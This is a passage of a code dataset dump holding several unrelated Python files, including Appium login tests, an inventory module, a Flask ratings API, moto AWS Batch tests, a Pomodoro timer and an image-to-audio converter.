z!=0.):\n\t\t\txh=0.\n\t\t\tyh=0.\n\t\t\tzh=np.sqrt(6./np.pi)*z\n\t\t\t\n\t\telif(np.abs(y)<=np.abs(x)):\n\t\t\tfactx=((2.**0.25)*x)/(np.sqrt(np.pi/6.)*(np.sqrt(np.sqrt(2.)-np.cos((y*np.pi)/(12.*x)))))\n\t\t\tX=factx*((np.sqrt(2.)*np.cos((y*np.pi)/(12.*x)))-1.)\n\t\t\tY=factx*(np.sqrt(2.)*np.sin((y*np.pi)/(12.*x)))\n\t\t\t\n\t\t\txh=np.sqrt(1-(((X**2.+Y**2.)*np.pi)/(24.*(z**2.))))*X\n\t\t\tyh=np.sqrt(1-(((X**2.+Y**2.)*np.pi)/(24.*(z**2.))))*Y\n\t\t\tzh=(np.sqrt(6./np.pi)*z)-(((X**2.+Y**2.)*np.sqrt(np.pi))/((np.sqrt(24.)*z)))\n\t\t\t\n\t\telif (np.abs(y)>=np.abs(x) ): \n\t\t\tfacty=((2.**0.25)*y)/(np.sqrt(np.pi/6.)*np.sqrt(np.sqrt(2.)-np.cos((x*np.pi)/(12.*y))))\n\t\t\tX=facty*(np.sqrt(2.)*np.sin((x*np.pi)/(12.*y)))\n\t\t\tY=facty*((np.sqrt(2.)*np.cos((x*np.pi)/(12.*y)))-1.)\n\t\t#~ if (y==x):\n\t\t\t#~ factx=((2.**0.25)*x)/(np.sqrt(np.pi/6.)*np.sqrt(np.sqrt(2.)-np.cos((np.pi)/(12.))))\n\t\t\t#~ X=factx*((np.sqrt(2.)*np.cos((np.pi)/(12.)))-1.)\n\t\t\t#~ Y=factx*(np.sqrt(2.)*np.sin((np.pi)/(12.)))\n\t\t\t\n\t\t\txh=np.sqrt(1-(((X**2.+Y**2.)*np.pi)/(24.*(z**2.))))*X\n\t\t\tyh=np.sqrt(1-(((X**2.+Y**2.)*np.pi)/(24.*(z**2.))))*Y\n\t\t\tzh=(np.sqrt(6./np.pi)*z)-(((X**2.+Y**2.)*np.sqrt(np.pi))/((np.sqrt(24.)*z)))\n\t\t\t\n\treturn (xh,yh,zh)\n\t\n\n\n\ndef pyramideP1(hauteur,N):\n\ta=hauteur\n\tb=hauteur\n\tdelta=hauteur/(N)\n\txf=[]\n\tyf=[]\n\tzf=[]\n\tfor i in range(0,1+N):\n\t\tz=hauteur-(i*delta)\n\t\txmax=np.abs(a-(i*delta))\n\t\tymax=np.abs(b-(i*delta))\n\t\tfor j in range(0,2*N+1):\n\t\t\tx=a-(j*delta)\n\t\t\tfor k in range(0,2*N+1):\n\t\t\t\ty=b-(k*delta)\n\t\t\t\tif(np.abs(y)<=np.abs(ymax)) and(np.abs(x)<=np.abs(xmax)):\n\t\t\t\t\txf.append(x)\n\t\t\t\t\tyf.append(y)\n\t\t\t\t\tzf.append(z)\n\treturn xf,yf,zf\n\ndef 
pyramideP2(hauteur,N):\n\ta=hauteur\n\tb=hauteur\n\tdelta=hauteur/(N)\n\txf=[]\n\tyf=[]\n\tzf=[]\n\tfor i in range(0,N+1):\n\t\tz=(i*delta)\n\t\txmax=np.abs(a-(i*delta))\n\t\tymax=np.abs(b-(i*delta))\n\t\tfor j in range(0,2*N+1):\n\t\t\tx=a-(j*delta)\n\t\t\tfor k in range(0,2*N+1):\n\t\t\t\ty=b-(k*delta)\n\t\t\t\tif(np.abs(y)<=np.abs(ymax)) and(np.abs(x)<=np.abs(xmax)):\n\t\t\t\t\txf.append(x)\n\t\t\t\t\tyf.append(y)\n\t\t\t\t\tzf.append(z-(hauteur))\n\treturn xf,yf,zf\n\n\n\n","sub_path":"Dictionnary/utils_dic.py","file_name":"utils_dic.py","file_ext":"py","file_size_in_byte":4319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"219525671","text":"#!/usr/bin/python3\n# -*- coding: UTF-8 -*-\n\nfrom time import sleep\nfrom basis.app_basis_page import AppBasisPage\nfrom config.elelocinfo import *\nfrom config.ime import *\n\nclass AppLoginPage(AppBasisPage):\n\n\n def login(self):\n exist_first_pager = self.driver.isElementExist(first_pager)\n if exist_first_pager == True:\n self.log('开始滑动欢迎页面...')\n for i in range(4):\n self.driver.swipeLeft(600)\n self.driver.click(first_pager)\n if exist_first_pager == False:\n print(\"成功跳过欢迎页面\")\n exist_login_btn = self.driver.isElementExist(login_btn)\n if exist_login_btn == True:\n self.log('货栈登陆中...')\n os.system(ime_appium)\n self.driver.type_clear(username_id,'15965645945')\n self.driver.type_clear(password_id,'123456')\n\n self.driver.click(login_btn)\n\n if exist_login_btn == False:\n self.log(\"APP已登录,开始模拟用户场景测试\")\n\n self.log('设置允许权限')\n while True:\n exist_allow = self.driver.isElementExist(allow)\n if exist_allow == True:\n self.driver.click(allow)\n if exist_allow == False:\n self.log('权限已被设置')\n break\n sleep(2)\n\n\n def login_inherit(self, data):\n\n exist_first_pager = self.driver.isElementExist(first_pager)\n if exist_first_pager == True:\n self.log('开始滑动欢迎页面...')\n for i in range(4):\n self.driver.swipeLeft(600)\n\n self.driver.click(first_pager)\n\n if exist_first_pager == False:\n print(\"成功跳过欢迎页面\")\n sleep(1)\n exist_login_btn = self.driver.isElementExist(login_btn)\n if exist_login_btn == True:\n self.log('货栈登陆中...')\n os.system(ime_appium)\n self.driver.type_clear(username_id,data['username'] )\n self.driver.type_clear(password_id, data['password'])\n\n self.driver.click(login_btn)\n\n if exist_login_btn == False:\n print(\"APP已登录,开始模拟用户场景测试\")\n\n self.log('设置允许权限')\n while True:\n exist_allow = self.driver.isElementExist(allow)\n if exist_allow == True:\n self.driver.click(allow)\n if exist_allow == False:\n self.log('跳过权限设置')\n break\n if data['casetype'] == 'True':\n\n self.log(\"回家 - 获取登录成功的断言文本\")\n self.driver.click(home_id)\n if self.driver.isElementExist(user_name_class) ==True :\n self.SUCCESS_TEXT = self.driver.get_text(user_name_class)\n print(\"断言文本:\"+self.SUCCESS_TEXT)\n if self.driver.isElementExist(user_name_class) == False:\n print(\"断言文本未能获取\")\n exist_my = self.driver.isElementExist(home_id)\n if exist_my == True:\n self.log('登录成功,点击我的')\n self.driver.click(home_id)\n self.log(\"点击设置\")\n self.driver.click(set_id)\n self.log(\"点击退出登录按钮\")\n self.driver.click(logout_btn)\n if exist_my == False:\n self.log(\"登录失败,继续下一条测试用例\")\n\n if data['casetype'] == 'False':\n try:\n\n self.log(\"获取登录失败的断言文本\")\n self.FAIL_TEXT = self.driver.get_text(login_btn)\n self.log(\"执行登录失败用例\")\n exist_login_btn = self.driver.isElementExist(login_btn)\n if exist_login_btn == True:\n pass\n\n if exist_login_btn == False:\n self.log(\"执行错误用例退出登陆\")\n self.log('点击我的')\n 
self.driver.click(home_id)\n                    self.log(\"点击设置\")\n                    self.driver.click(set_id)\n                    self.log(\"点击退出登录按钮\")\n                    self.driver.click(logout_btn)\n            except:\n                print('未能正常运行用例'+data['number'])\n\n","sub_path":"pages/app_login_page.py","file_name":"app_login_page.py","file_ext":"py","file_size_in_byte":4341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"554013669","text":"from commerce.item import Item\ninventory_number = 0\nallItems = {\n \n}\n\ndef get_id_number():\n    global inventory_number\n\n    inventory_number += 1\n    return inventory_number - 1\n\ndef getItem(name=None, description=None):\n    #Attribute names follow the capitalized convention the Item class uses below (Name, Quantity)\n    for item in allItems.values():\n        if (name != None and item.Name == name):\n            return item\n        elif (description != None and item.Description == description):\n            return item\n    return \"Invalid\"\n\n#The passed in item here will be of the Item class\ndef addItem(item):\n    if (getItem(name=item.Name) != \"Invalid\"):\n        item.Quantity += 1\n    else:\n        index = get_id_number()\n        allItems[index] = item\n\n#The passed in item here will be inputs for Item class\n#name, description, quantity=1, price=0, damageHP=0\ndef addItem(name, description, quantity=1, price=0, damageHP=0):\n    output = getItem(name=name)\n    if (output == \"Invalid\"):\n        newItem = Item(name, description, quantity, price, damageHP)\n        index = get_id_number()\n        allItems[index] = newItem\n    else:\n        output.Quantity += 1\n#Python rework of addItem version 1:\n# def addItemInstance(item):\n    # [Insert body of first addItem version]\n# def addItemFromData(name, description, quantity=1, price=0, damageHP=0):\n    # [Insert body of second addItem version]\n\n# referenceItem = Item(\"An instance\", \"Use for type comparison\")\n# def addItem(name_or_item, description=None, quantity=1, price=0, damageHP=0): #Sadly, Python doesn't support function overloading, so this has to be one function\n    # if type(name_or_item) == type(referenceItem): #Could also have a required argument specifying the mode\n        # addItemInstance(name_or_item)\n    # elif description == None: #Not an item, description required.\n        # raise TypeError(\"Must specify description when name_or_item is not an Item instance\")\n    # else:\n        # addItemFromData(name_or_item, description, quantity, price, damageHP)\n\n#Second Python rework of addItem:\n# referenceItem = Item(\"An instance\", \"Use for type comparison\")\n# def addItem(name_or_item, description=None, quantity=1, price=0, damageHP=0):\n    # if type(name_or_item) == type(referenceItem): #Again, required argument specifying mode also works\n        # item = name_or_item\n        # name = item.Name\n    # elif description == None: #Same as in addItem\n        # raise TypeError(\"Must specify description when name_or_item is not an Item instance\")\n    # else:\n        # name = name_or_item\n        # item = Item(name, description, quantity, price, damageHP)\n \n    # output = getItem(name) #Unless you think the order will change, it's fine to use positional arguments\n    # if output == \"Invalid\":\n        # key = get_id_number() #It's technically a key, not an index (though the syntax is the same), by the way\n        # allItem[key] = newItem\n    # else:\n        # output.Quantity += 1 #I'm not sure if it should be incremented by 1 or by the quantity parameter\n\n#Delete by accessing the id number\ndef delete_item(id):\n    if not (id in allItems.keys()):\n        return \"ErrorNotFound\"\n    allItems.get(id).Quantity -= 1\n    if (allItems.get(id).Quantity <= 0):\n        del allItems[id]  #dicts have no .remove(); delete the key instead\n\ndef inventory_update_from_instance(user_instance):\n    global allItems\n    allItems = 
user_instance.getDataField(\"allItems\");","sub_path":"util/variable/inventory.py","file_name":"inventory.py","file_ext":"py","file_size_in_byte":3153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"633468244","text":"import json\nfrom flask import Flask,request\n\nimport config, loader\n\napp = Flask(__name__)\n\n@app.route(\"/ratings\", methods=[\"GET\"])\ndef ratings():\n data_loader = loader.Loader()\n data = data_loader.load()\n return json.dumps(data)\n\n@app.route(\"/ratings/\", methods=[\"GET\"])\ndef rating_one(book_id):\n data_loader = loader.Loader()\n data = data_loader.load()\n if book_id not in data.keys():\n return json.dumps({})\n return data[book_id]\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=5000)\n","sub_path":"projects/ratings/v1/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"580386895","text":"import boto3\nimport json\nfrom moto import mock_iam, mock_ec2, mock_ecs, mock_cloudformation\nfrom moto import mock_batch_simple as mock_batch_without_docker\nfrom uuid import uuid4\n\n\n# Copy of test_batch/test_batch_cloudformation\n# Except that we verify this behaviour still works without docker\n\n\nDEFAULT_REGION = \"eu-central-1\"\n\n\ndef _get_clients():\n return (\n boto3.client(\"ec2\", region_name=DEFAULT_REGION),\n boto3.client(\"iam\", region_name=DEFAULT_REGION),\n boto3.client(\"ecs\", region_name=DEFAULT_REGION),\n boto3.client(\"logs\", region_name=DEFAULT_REGION),\n boto3.client(\"batch\", region_name=DEFAULT_REGION),\n )\n\n\ndef _setup(ec2_client, iam_client):\n \"\"\"\n Do prerequisite setup\n :return: VPC ID, Subnet ID, Security group ID, IAM Role ARN\n :rtype: tuple\n \"\"\"\n resp = ec2_client.create_vpc(CidrBlock=\"172.30.0.0/24\")\n vpc_id = resp[\"Vpc\"][\"VpcId\"]\n resp = ec2_client.create_subnet(\n AvailabilityZone=\"eu-central-1a\", CidrBlock=\"172.30.0.0/25\", VpcId=vpc_id\n )\n subnet_id = resp[\"Subnet\"][\"SubnetId\"]\n resp = ec2_client.create_security_group(\n Description=\"test_sg_desc\", GroupName=str(uuid4())[0:6], VpcId=vpc_id\n )\n sg_id = resp[\"GroupId\"]\n\n role_name = str(uuid4())[0:6]\n resp = iam_client.create_role(\n RoleName=role_name, AssumeRolePolicyDocument=\"some_policy\"\n )\n iam_arn = resp[\"Role\"][\"Arn\"]\n iam_client.create_instance_profile(InstanceProfileName=role_name)\n iam_client.add_role_to_instance_profile(\n InstanceProfileName=role_name, RoleName=role_name\n )\n\n return vpc_id, subnet_id, sg_id, iam_arn\n\n\n@mock_cloudformation()\n@mock_ec2\n@mock_ecs\n@mock_iam\n@mock_batch_without_docker\ndef test_create_env_cf():\n ec2_client, iam_client, _, _, _ = _get_clients()\n _, subnet_id, sg_id, iam_arn = _setup(ec2_client, iam_client)\n\n create_environment_template = {\n \"Resources\": {\n \"ComputeEnvironment\": {\n \"Type\": \"AWS::Batch::ComputeEnvironment\",\n \"Properties\": {\n \"Type\": \"MANAGED\",\n \"ComputeResources\": {\n \"Type\": \"EC2\",\n \"MinvCpus\": 0,\n \"DesiredvCpus\": 0,\n \"MaxvCpus\": 64,\n \"InstanceTypes\": [\"optimal\"],\n \"Subnets\": [subnet_id],\n \"SecurityGroupIds\": [sg_id],\n \"InstanceRole\": iam_arn.replace(\"role\", \"instance-profile\"),\n },\n \"ServiceRole\": iam_arn,\n },\n }\n }\n }\n cf_json = json.dumps(create_environment_template)\n\n cf_conn = boto3.client(\"cloudformation\", DEFAULT_REGION)\n stack_name = str(uuid4())[0:6]\n stack_id = 
cf_conn.create_stack(StackName=stack_name, TemplateBody=cf_json)[\n \"StackId\"\n ]\n\n stack_resources = cf_conn.list_stack_resources(StackName=stack_id)\n summary = stack_resources[\"StackResourceSummaries\"][0]\n\n assert summary[\"ResourceStatus\"] == \"CREATE_COMPLETE\"\n # Spot checks on the ARN\n assert \"arn:aws:batch:\" in summary[\"PhysicalResourceId\"]\n assert stack_name in summary[\"PhysicalResourceId\"]\n\n\n@mock_cloudformation()\n@mock_ec2\n@mock_ecs\n@mock_iam\n@mock_batch_without_docker\ndef test_create_job_queue_cf():\n ec2_client, iam_client, _, _, _ = _get_clients()\n _, subnet_id, sg_id, iam_arn = _setup(ec2_client, iam_client)\n\n create_environment_template = {\n \"Resources\": {\n \"ComputeEnvironment\": {\n \"Type\": \"AWS::Batch::ComputeEnvironment\",\n \"Properties\": {\n \"Type\": \"MANAGED\",\n \"ComputeResources\": {\n \"Type\": \"EC2\",\n \"MinvCpus\": 0,\n \"DesiredvCpus\": 0,\n \"MaxvCpus\": 64,\n \"InstanceTypes\": [\"optimal\"],\n \"Subnets\": [subnet_id],\n \"SecurityGroupIds\": [sg_id],\n \"InstanceRole\": iam_arn.replace(\"role\", \"instance-profile\"),\n },\n \"ServiceRole\": iam_arn,\n },\n },\n \"JobQueue\": {\n \"Type\": \"AWS::Batch::JobQueue\",\n \"Properties\": {\n \"Priority\": 1,\n \"ComputeEnvironmentOrder\": [\n {\n \"Order\": 1,\n \"ComputeEnvironment\": {\"Ref\": \"ComputeEnvironment\"},\n }\n ],\n },\n },\n }\n }\n cf_json = json.dumps(create_environment_template)\n\n cf_conn = boto3.client(\"cloudformation\", DEFAULT_REGION)\n stack_name = str(uuid4())[0:6]\n stack_id = cf_conn.create_stack(StackName=stack_name, TemplateBody=cf_json)[\n \"StackId\"\n ]\n\n stack_resources = cf_conn.list_stack_resources(StackName=stack_id)\n assert len(stack_resources[\"StackResourceSummaries\"]) == 2\n\n job_queue_resource = list(\n filter(\n lambda item: item[\"ResourceType\"] == \"AWS::Batch::JobQueue\",\n stack_resources[\"StackResourceSummaries\"],\n )\n )[0]\n\n assert job_queue_resource[\"ResourceStatus\"] == \"CREATE_COMPLETE\"\n # Spot checks on the ARN\n assert job_queue_resource[\"PhysicalResourceId\"].startswith(\"arn:aws:batch:\")\n assert stack_name in job_queue_resource[\"PhysicalResourceId\"]\n assert \"job-queue/\" in job_queue_resource[\"PhysicalResourceId\"]\n\n\n@mock_cloudformation\n@mock_ec2\n@mock_ecs\n@mock_iam\n@mock_batch_without_docker\ndef test_create_job_def_cf():\n ec2_client, iam_client, _, _, _ = _get_clients()\n _, subnet_id, sg_id, iam_arn = _setup(ec2_client, iam_client)\n\n create_environment_template = {\n \"Resources\": {\n \"ComputeEnvironment\": {\n \"Type\": \"AWS::Batch::ComputeEnvironment\",\n \"Properties\": {\n \"Type\": \"MANAGED\",\n \"ComputeResources\": {\n \"Type\": \"EC2\",\n \"MinvCpus\": 0,\n \"DesiredvCpus\": 0,\n \"MaxvCpus\": 64,\n \"InstanceTypes\": [\"optimal\"],\n \"Subnets\": [subnet_id],\n \"SecurityGroupIds\": [sg_id],\n \"InstanceRole\": iam_arn.replace(\"role\", \"instance-profile\"),\n },\n \"ServiceRole\": iam_arn,\n },\n },\n \"JobQueue\": {\n \"Type\": \"AWS::Batch::JobQueue\",\n \"Properties\": {\n \"Priority\": 1,\n \"ComputeEnvironmentOrder\": [\n {\n \"Order\": 1,\n \"ComputeEnvironment\": {\"Ref\": \"ComputeEnvironment\"},\n }\n ],\n },\n },\n \"JobDefinition\": {\n \"Type\": \"AWS::Batch::JobDefinition\",\n \"Properties\": {\n \"Type\": \"container\",\n \"ContainerProperties\": {\n \"Image\": {\n \"Fn::Join\": [\n \"\",\n [\n \"137112412989.dkr.ecr.\",\n {\"Ref\": \"AWS::Region\"},\n \".amazonaws.com/amazonlinux:latest\",\n ],\n ]\n },\n \"ResourceRequirements\": [\n {\"Type\": 
\"MEMORY\", \"Value\": 2000},\n {\"Type\": \"VCPU\", \"Value\": 2},\n ],\n \"Command\": [\"echo\", \"Hello world\"],\n \"LinuxParameters\": {\"Devices\": [{\"HostPath\": \"test-path\"}]},\n },\n \"RetryStrategy\": {\"Attempts\": 1},\n },\n },\n }\n }\n cf_json = json.dumps(create_environment_template)\n\n cf_conn = boto3.client(\"cloudformation\", DEFAULT_REGION)\n stack_name = str(uuid4())[0:6]\n stack_id = cf_conn.create_stack(StackName=stack_name, TemplateBody=cf_json)[\n \"StackId\"\n ]\n\n stack_resources = cf_conn.list_stack_resources(StackName=stack_id)\n assert len(stack_resources[\"StackResourceSummaries\"]) == 3\n\n job_def_resource = list(\n filter(\n lambda item: item[\"ResourceType\"] == \"AWS::Batch::JobDefinition\",\n stack_resources[\"StackResourceSummaries\"],\n )\n )[0]\n\n assert job_def_resource[\"ResourceStatus\"] == \"CREATE_COMPLETE\"\n # Spot checks on the ARN\n assert job_def_resource[\"PhysicalResourceId\"].startswith(\"arn:aws:batch:\")\n assert f\"{stack_name}-JobDef\" in job_def_resource[\"PhysicalResourceId\"]\n assert \"job-definition/\" in job_def_resource[\"PhysicalResourceId\"]\n\n # Test the linux parameter device host path\n # This ensures that batch is parsing the parameter dictionaries\n # correctly by recursively converting the first character of all\n # dict keys to lowercase.\n batch_conn = boto3.client(\"batch\", DEFAULT_REGION)\n response = batch_conn.describe_job_definitions(\n jobDefinitions=[job_def_resource[\"PhysicalResourceId\"]]\n )\n job_def_linux_device_host_path = response.get(\"jobDefinitions\")[0][\n \"containerProperties\"\n ][\"linuxParameters\"][\"devices\"][0][\"hostPath\"]\n\n assert job_def_linux_device_host_path == \"test-path\"\n","sub_path":"tests/test_batch_simple/test_batch_cloudformation.py","file_name":"test_batch_cloudformation.py","file_ext":"py","file_size_in_byte":9619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"379139210","text":"# coding:utf8\nimport csv, os, time\n\n\n# 控制类\nclass Controller(object):\n def __init__(self, count):\n self.counter = count\n self.alldata = [('timestamp', 'cpustatus')]\n\n # 单次测试过程\n def testprocess(self):\n result = os.popen(\"adb shell dumpsys cpuinfo | grep package\")\n for line in result.readlines():\n cpuvalue = line.split('%')[0]\n\n currenttime = self.getCurrentTime()\n self.alldata.append((currenttime, cpuvalue))\n\n # 多次执行测试过程\n def run(self):\n while self.counter > 0:\n self.testprocess()\n self.counter = self.counter - 1\n time.sleep(5)\n\n # 获取当前的时间戳\n def getCurrentTime(self):\n currentTime = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n return currentTime\n\n # 数据的存储\n def saveDataCSV(self):\n csvfile = open('cpustatus.csv', 'wb')\n writer = csv.writer(csvfile)\n writer.writerrows(self.alldata)\n csvfile.close()\n\n\nif __name__=='__main__':\n controller = Controller(10)\n controller.run()\n controller.saveDataCSV()","sub_path":"PerformenceScript/CpuTest.py","file_name":"CpuTest.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"52798237","text":"from tkinter import *\nimport math\n\n# ---------------------------- CONSTANTS ------------------------------- #\nPINK = \"#e2979c\"\nRED = \"#e7305b\"\nGREEN = \"#9bdeac\"\nYELLOW = \"#f7f5dd\"\nFONT_NAME = \"Courier\"\nWORK_MIN = 25\nSHORT_BREAK_MIN = 5\nLONG_BREAK_MIN = 20\nrun_time = 0\ntim = None\n\n\n# ---------------------------- TIMER RESET 
------------------------------- #\ndef reset():\n windows.after_cancel(tim)\n timer_label.config(text=\"Timer\", fg=GREEN)\n canvas.itemconfig(timer_text, text=\"00:00\")\n checkmark_label.config(text=\"\")\n\n\n# ---------------------------- TIMER MECHANISM ------------------------------- #\ndef start_timer():\n global run_time\n if run_time == 0 or run_time == 2 or run_time == 4 or run_time == 6:\n timer_label.config(text=\"Work\", fg=RED)\n count_down(WORK_MIN * 60)\n mark = \" \"\n for _ in range(run_time):\n mark += \"✔\"\n checkmark_label.config(text=mark)\n elif run_time == 1 or run_time == 3 or run_time == 5:\n timer_label.config(text=\"Break\", fg=PINK)\n count_down(SHORT_BREAK_MIN * 60)\n mark = \" \"\n for _ in range(run_time):\n mark += \"✔\"\n checkmark_label.config(text=mark)\n elif run_time == 7:\n timer_label.config(text=\"Break\", fg=GREEN)\n count_down(LONG_BREAK_MIN * 60)\n mark = \" \"\n for _ in range(run_time):\n mark += \"✔\"\n checkmark_label.config(text=mark)\n\n\n# ---------------------------- COUNTDOWN MECHANISM ------------------------------- #\ndef count_down(count):\n global tim\n minute = math.floor(count / 60)\n sec = count % 60\n if sec >= 0 and minute >= 0:\n canvas.itemconfig(timer_text, text=f\"{minute}:{sec}\")\n if sec < 10:\n canvas.itemconfig(timer_text, text=f\"{minute}:0{sec}\")\n if minute == 0 and sec == 0:\n global run_time\n run_time += 1\n start_timer()\n tim = windows.after(1000, count_down, count - 1)\n\n\n# ---------------------------- UI SETUP ------------------------------- #\nwindows = Tk()\nwindows.title(\"pomodoro\")\nwindows.config(padx=100, pady=50, bg=YELLOW)\n# label for Timer text\ntimer_label = Label(text=\"Timer\", fg=GREEN, font=(FONT_NAME, 35, \"bold\"), bg=YELLOW)\n# label for checkmark\ncheckmark_label = Label(fg=GREEN, bg=YELLOW)\n# canvas for the tomato picture\ncanvas = Canvas(width=200, height=224, bg=YELLOW, highlightthickness=0)\nmy_image = PhotoImage(file=\"tomato.png\")\ncanvas.create_image(100, 112, image=my_image)\ntimer_text = canvas.create_text(100, 130, text=\"00:00\", fill=\"white\", font=(FONT_NAME, 35, \"bold\"))\n# created a button called start\nstart_button = Button(text=\"Start\", bg=YELLOW, command=start_timer)\n# created a button called restart\nreset_button = Button(text=\"Reset\", bg=YELLOW, command=reset)\n# grid all of them together\ntimer_label.grid(row=0, column=3)\ncanvas.grid(row=1, column=3)\nstart_button.grid(row=2, column=1)\nreset_button.grid(row=2, column=4)\ncheckmark_label.grid(row=3, column=3)\nwindows.mainloop()\n","sub_path":"Pomodoro/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"574610773","text":"#! 
/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom PIL import Image, ImageOps\nimport wave, math, array, argparse, sys, timeit\nfrom tkinter import Tk, Label, Entry, Button, END\nfrom math import floor\n\ndef createUI():\n    root = Tk()\n    root.title(\"Здесь могла быть ваша реклама\")\n    root.resizable(False, False)\n\n    ui_table = [\n        [\"Имя входного файла\", \"Здесь могла быть ваша реклама\"],\n        [\"Имя выходного файла\", \"out.wav\"],\n        [\"Нижний порог частот\", \"200\"],\n        [\"Верхний порог частот\", \"20000\"],\n        [\"Пикселей в секунду\", \"30\"],\n        [\"Частота дискретизации\", \"44100\"]\n    ]\n\n    entries = []\n\n    for row, info in enumerate(ui_table):\n        label = Label(root, text=info[0], font=\"arial 24\")\n        label.grid(row=row, padx=25, sticky=\"w\")\n\n        entries.append(Entry(root, font=\"arial 24\", fg=\"grey\"))\n        entries[-1].grid(row=row, column=1, padx=25)\n        entries[-1].insert(END, info[1])\n\n    convert_button = Button(root, text=\"Конвертировать\", font=\"arial 32\", command=lambda: convert(\n        entries[0].get(),\n        entries[1].get(),\n        int(entries[2].get()),\n        int(entries[3].get()),\n        int(entries[4].get()),\n        int(entries[5].get()))\n    )\n    convert_button.grid(row=6, column=0, columnspan=2, pady=20)\n\n    root.mainloop()\n\ndef parser():\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"INPUT\", help=\"Имя входного файла.\")\n    parser.add_argument(\"-n\", \"--name\", help=\"Имя выходного файла. Базовое имя: out.wav.\")\n    parser.add_argument(\"-b\", \"--bottom\", help=\"Нижний порог частот. Базовое значение: 200.\", type=int)\n    parser.add_argument(\"-t\", \"--top\", help=\"Верхний порог частот. Базовое значение: 20000.\", type=int)\n    parser.add_argument(\"-p\", \"--pixels\", help=\"Пикселей в секунду. Базовое значение: 30.\", type=int)\n    parser.add_argument(\"-s\", \"--sampling\", help=\"Частота дискретизации. Базовое значение: 44100.\", type=int)\n    args = parser.parse_args()\n\n    minfreq = 200\n    maxfreq = 20000\n    wavrate = 44100\n    pxs = 30\n    name = \"out.wav\"\n\n    if args.name:\n        name = args.name\n    if args.bottom:\n        minfreq = args.bottom\n    if args.top:\n        maxfreq = args.top\n    if args.pixels:\n        pxs = args.pixels\n    if args.sampling:\n        wavrate = args.sampling\n\n\n    print('Преобразуемая картинка: %s.' % args.INPUT)\n    print('Частотный диапазон: %d - %d.' % (minfreq, maxfreq))\n    print('Пикселей в секунду: %d.' % pxs)\n    print('Частота дискретизации: %d.' % wavrate)\n    print('Имя выходного файла: %s.' 
% name)\n\n    return (args.INPUT, name, minfreq, maxfreq, pxs, wavrate)\n\ndef convert(inpt, name, minfreq, maxfreq, pxs, wavrate):\n\n    # Tkinter\n    root = Tk()\n    root.title(\"Прогресс\")\n\n    progress_label = Label(root, text=\"Прогресс\", font=\"arial 24\")\n    progress_label.pack()\n\n    img = Image.open(inpt).convert('L')\n    name = wave.open(name, 'w')\n    name.setparams((1, 2, wavrate, 0, 'NONE', 'not compressed'))\n\n    freqrange = maxfreq - minfreq\n    interval = freqrange / img.size[1]\n\n    fpx = wavrate // pxs\n    data = array.array('h')\n\n    tm = timeit.default_timer()\n\n    for x in range(img.size[0]):\n        row = []\n        for y in range(img.size[1]):\n            yinv = img.size[1] - y - 1\n            amp = img.getpixel((x,y))\n            if (amp > 0):\n                row.append( genwave(yinv * interval + minfreq, amp, fpx, wavrate) )\n\n        for i in range(fpx):\n            for j in row:\n                try:\n                    data[i + x * fpx] += j[i]\n                except(IndexError):\n                    data.insert(i + x * fpx, j[i])\n                except(OverflowError):\n                    if j[i] > 0:\n                        data[i + x * fpx] = 32767\n                    else:\n                        data[i + x * fpx] = -32768\n\n        # sys.stdout.write(\"Преобразование в процессе, осталось: %d%% \\r\" % (float(x) / img.size[0]*100) )\n        # sys.stdout.flush()\n\n        progress_label.configure(text=f\"Преобразование в процессе, осталось: {float(x) / img.size[0] * 100:.2f}%\")\n        root.update()\n\n    # array.array.tostring() was removed in Python 3.9; tobytes() hands the wave\n    # module the raw little-endian PCM buffer it expects.\n    name.writeframes(data.tobytes())\n    name.close()\n\n    tms = timeit.default_timer()\n\n    progress_label.configure(text=f\"Преобразование в процессе, осталось: 100%\")\n    root.destroy()\n    print(\"Преобразование в процессе, осталось: 100%\")\n    print(\"Успешно завершено за %d секунд.\" % int(tms-tm))\n\ndef genwave(frequency, amplitude, samples, samplerate):\n    cycles = samples * frequency / samplerate\n    a = []\n    for i in range(samples):\n        x = math.sin(float(cycles) * 2 * math.pi * i / float(samples)) * float(amplitude)\n        a.append(int(math.floor(x)))\n    return a\n\nif __name__ == '__main__':\n    #inpt = parser()\n    #convert(*inpt)\n    createUI()\n","sub_path":"project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":5448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"168655378","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('djcelery', '__first__'),\n        migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n        ('backend', '0001_initial'),\n    ]\n\n    operations = [\n        migrations.CreateModel(\n            name='DailyOptimizerTask',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('is_active', models.BooleanField(default=True)),\n                ('last_scheduled_on', models.DateTimeField(null=True, blank=True)),\n                ('lighting_enabled', models.BooleanField(default=True)),\n                ('lighting_series_light', models.CharField(default=None, max_length=1024, null=True, blank=True)),\n                ('hvac_enabled', models.BooleanField(default=True)),\n                ('hvac_series_compressor', models.CharField(default=None, max_length=1024, null=True, blank=True)),\n                ('hvac_series_pump_chiller', models.CharField(default=None, max_length=1024, null=True, blank=True)),\n                ('hvac_series_pump_cooling', models.CharField(default=None, max_length=1024, null=True, blank=True)),\n                ('hvac_series_temp', models.CharField(default=None, max_length=1024, null=True, blank=True)),\n                ('eu_target', 